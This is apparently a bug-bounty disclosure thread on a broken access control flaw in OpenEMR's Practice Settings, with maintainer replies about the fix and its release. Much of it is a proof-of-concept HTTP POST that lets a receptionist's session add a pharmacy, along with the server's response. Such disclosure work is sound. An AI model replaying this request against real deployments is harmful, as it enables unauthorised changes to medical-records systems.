Broken Access Controls in Pratice settings in openemr/openemr
Dec 26th 2022
We observed that a
receptionist user can add a
Pharmacy in the
Pratice Settings section, although this area is restricted to
Proof of Concept
POST /openemr/controller.php?practice_settings&pharmacy&action=edit Host: demo.openemr.io Cookie: OpenEMR=<receptionist user's cookie> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Content-Type: application/x-www-form-urlencoded Content-Length: 144 Origin: https://demo.openemr.io Referer: https://demo.openemr.io/openemr/controller.php?practice_settings&pharmacy&action=edit form_id=&name=test_pharmarcy&address_line1=11&address_line2=11&city=&state=&zip=&email=&phone=&fax=&npi=&ncpdp=&transmit_method=1&id=&process=true
302 Found Server: nginx/1.21.1 Date: Mon, 26 Dec 2022 09:02:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/8.0.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: /openemr/controller.php?practice_settings&pharmacy&action=list Content-Length: 9246 <html> <head> <title>Practice Settings</title> <meta charset="utf-8" /> ...
After we send the request above
there is a new pharmacy added
This vulnerability allows a front desk user to add any pharmacy, which could break the logic of the application.
This is fixed is in master branch at https://github.com/openemr/openemr/commit/bb4244c83a74628faafabc0598366f49863914a9
@Nhien.IT, @admin, I am unable to mark this as fixed, since that requires hard-setting a publish date, which I am unable to safely predict. We plan to release OpenEMR 7.0.1 in about 3-4 weeks, which will include this fix. At that time (after release OpenEMR 7.0.1), we will then mark this issue as fixed (and publish at that time with a cve).
thanks for the report @Nhien.IT !
Thanks for your effort, I hope to publish a fix version soon.
I have received mail about 7.0.1 version being published.Any update here?